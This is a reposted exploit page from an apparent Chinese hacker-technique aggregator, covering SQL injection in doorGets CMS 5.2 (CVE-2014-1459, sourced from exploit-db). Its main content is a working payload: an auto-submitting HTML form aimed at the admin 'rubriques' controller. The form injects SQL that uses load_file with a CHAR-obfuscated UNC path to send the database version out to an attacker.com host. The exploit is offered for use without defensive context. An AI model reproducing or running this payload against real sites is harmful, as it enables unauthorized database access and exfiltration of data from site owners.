记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

doorGets CMS 5.2 SQL注入

2014-02-10 16:30
官网:http://www.doorgets.com/
 
CVE:

<a href=”http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1459″ rel=”nofollow” target=”_blank”>2014-1459</a>
 
FROM:http://www.exploit-db.com/exploits/31521/
 
exp:

<pre class=”brush: html; gutter: true”><form action=”http://[host]/dg-admin/?controller=rubriques” method=”post” name=”main”>
<input type=”hidden” name=”_position_down_id” value=”1 AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) — “>
<input type=”hidden” name=”_position_down_position” value=”1″>
<input type=”hidden” name=”_position_down_submit” value=”1″>
<input type=”hidden” name=”_position_down_type” value=”down”>
<input type=”submit” id=”btn”>
</form>
<script>
document.getElementById(’btn’).click();
</script></pre>

 


知识来源: www.2cto.com/Article/201402/277026.html

阅读:73174 | 评论:0 | 标签:注入 cms

想收藏或者和大家分享这篇好文章→复制链接地址

“doorGets CMS 5.2 SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云